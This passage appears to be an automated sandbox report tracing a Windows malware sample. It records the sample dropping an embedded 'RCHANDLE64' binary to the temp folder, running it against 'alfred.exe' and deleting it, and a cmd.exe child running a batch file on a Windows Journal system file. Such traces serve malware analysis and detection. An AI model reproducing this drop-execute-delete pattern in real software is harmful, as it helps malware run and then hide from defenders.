!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9e\xcb\x3a", lpUsedDefaultChar=0x0) returned 256 [0218.061] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0218.061] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0218.061] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0218.061] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0218.061] GetCurrentProcess () returned 0xffffffff [0218.061] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0218.061] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0218.061] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0218.061] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0218.061] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0218.061] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0218.061] LockResource (hResData=0x43c648) returned 0x43c648 [0218.062] GetCurrentPackageId () returned 0x3d54 [0218.062] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0218.222] GetFileType (hFile=0x190) returned 0x1 [0218.222] WriteFile (in: hFile=0x190, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x19defc, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x19defc*=0x37000, lpOverlapped=0x0) returned 1 [0218.229] WriteFile (in: hFile=0x190, lpBuffer=0x5ec910*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x19def8, lpOverlapped=0x0 | out: lpBuffer=0x5ec910*, lpNumberOfBytesWritten=0x19def8*=0x490, lpOverlapped=0x0) returned 1 [0218.230] CloseHandle (hObject=0x190) returned 1 [0218.230] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner" [0218.230] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", lpCommandLine="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fac4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb08 | out: lpCommandLine="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner", lpProcessInformation=0x19fb08*(hProcess=0x194, hThread=0x190, dwProcessId=0xa54, dwThreadId=0xb2c)) returned 1 [0219.862] WaitForSingleObject (hHandle=0x194, dwMilliseconds=0xffffffff) returned 0x0 [0271.881] DeleteFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 1 [0272.395] CloseHandle (hObject=0x194) returned 1 [0272.395] CloseHandle (hObject=0x190) returned 1 [0272.395] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0272.395] ExitProcess (uExitCode=0x0) Thread: id = 142 os_tid = 0xae4 Process: id = "21" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3d965000" os_pid = "0x578" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1609 start_va = 0xc0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1610 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1611 start_va = 0xf0000 end_va = 0x103fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1612 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1613 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1614 start_va = 0x250000 end_va = 0x253fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1615 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1616 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1617 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1618 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 1619 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1620 start_va = 0x7f3c0000 end_va = 0x7f3e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3c0000" filename = "" Region: id = 1621 start_va = 0x7f3e5000 end_va = 0x7f3e5fff entry_point = 0x0 region_type = private name = "private_0x000000007f3e5000" filename = "" Region: id = 1622 start_va = 0x7f3ea000 end_va = 0x7f3ecfff entry_point = 0x0 region_type = private name = "private_0x000000007f3ea000" filename = "" Region: id = 1623 start_va = 0x7f3ed000 end_va = 0x7f3edfff entry_point = 0x0 region_type = private name = "private_0x000000007f3ed000" filename = "" Region: id = 1624 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1625 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1626 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1627 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1628 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1629 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1630 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1631 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1632 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1633 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1674 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1675 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1676 start_va = 0x300000 end_va = 0x3bdfff entry_point = 0x300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1677 start_va = 0x530000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1678 start_va = 0x7c0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1679 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1680 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1681 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1682 start_va = 0x7f2c0000 end_va = 0x7f3bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f2c0000" filename = "" Region: id = 1683 start_va = 0x7f3e7000 end_va = 0x7f3e9fff entry_point = 0x0 region_type = private name = "private_0x000000007f3e7000" filename = "" Region: id = 1684 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1685 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1686 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 1687 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1688 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1689 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1690 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1691 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1692 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1693 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1719 start_va = 0x7d0000 end_va = 0xb06fff entry_point = 0x7d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 143 os_tid = 0xe00 [0213.997] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0213.997] __set_app_type (_Type=0x1) [0213.998] __p__fmode () returned 0x77984d6c [0213.998] __p__commode () returned 0x77985b1c [0213.998] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0213.998] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0213.998] GetCurrentThreadId () returned 0xe00 [0213.998] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe00) returned 0x84 [0213.998] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0213.998] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0213.998] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.001] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.001] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f8b8 | out: phkResult=0x24f8b8*=0x0) returned 0x2 [0214.001] VirtualQuery (in: lpAddress=0x24f8bf, lpBuffer=0x24f870, dwLength=0x1c | out: lpBuffer=0x24f870*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.001] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f870, dwLength=0x1c | out: lpBuffer=0x24f870*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0214.001] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f870, dwLength=0x1c | out: lpBuffer=0x24f870*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0214.001] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f870, dwLength=0x1c | out: lpBuffer=0x24f870*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.001] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f870, dwLength=0x1c | out: lpBuffer=0x24f870*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0214.001] GetConsoleOutputCP () returned 0x1b5 [0214.002] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0214.002] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0214.002] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.002] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0214.002] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.002] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0214.002] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.002] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0214.003] _get_osfhandle (_FileHandle=0) returned 0x38 [0214.003] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0214.003] _get_osfhandle (_FileHandle=0) returned 0x38 [0214.003] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0214.003] GetEnvironmentStringsW () returned 0x437ea0* [0214.003] FreeEnvironmentStringsA (penv="A") returned 1 [0214.003] GetEnvironmentStringsW () returned 0x437ea0* [0214.003] FreeEnvironmentStringsA (penv="A") returned 1 [0214.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e81c | out: phkResult=0x24e81c*=0x94) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x0, lpData=0x24e828*=0xc8, lpcbData=0x24e824*=0x1000) returned 0x2 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x4, lpData=0x24e828*=0x1, lpcbData=0x24e824*=0x4) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x0, lpData=0x24e828*=0x1, lpcbData=0x24e824*=0x1000) returned 0x2 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x4, lpData=0x24e828*=0x0, lpcbData=0x24e824*=0x4) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x4, lpData=0x24e828*=0x40, lpcbData=0x24e824*=0x4) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x4, lpData=0x24e828*=0x40, lpcbData=0x24e824*=0x4) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x0, lpData=0x24e828*=0x40, lpcbData=0x24e824*=0x1000) returned 0x2 [0214.004] RegCloseKey (hKey=0x94) returned 0x0 [0214.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e81c | out: phkResult=0x24e81c*=0x94) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x0, lpData=0x24e828*=0x40, lpcbData=0x24e824*=0x1000) returned 0x2 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x4, lpData=0x24e828*=0x1, lpcbData=0x24e824*=0x4) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x0, lpData=0x24e828*=0x1, lpcbData=0x24e824*=0x1000) returned 0x2 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x4, lpData=0x24e828*=0x0, lpcbData=0x24e824*=0x4) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x4, lpData=0x24e828*=0x9, lpcbData=0x24e824*=0x4) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x4, lpData=0x24e828*=0x9, lpcbData=0x24e824*=0x4) returned 0x0 [0214.004] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e820, lpData=0x24e828, lpcbData=0x24e824*=0x1000 | out: lpType=0x24e820*=0x0, lpData=0x24e828*=0x9, lpcbData=0x24e824*=0x1000) returned 0x2 [0214.004] RegCloseKey (hKey=0x94) returned 0x0 [0214.004] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb4325e [0214.004] srand (_Seed=0x5bb4325e) [0214.004] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"\"" [0214.004] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"\"" [0214.004] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0214.004] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x437ea8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 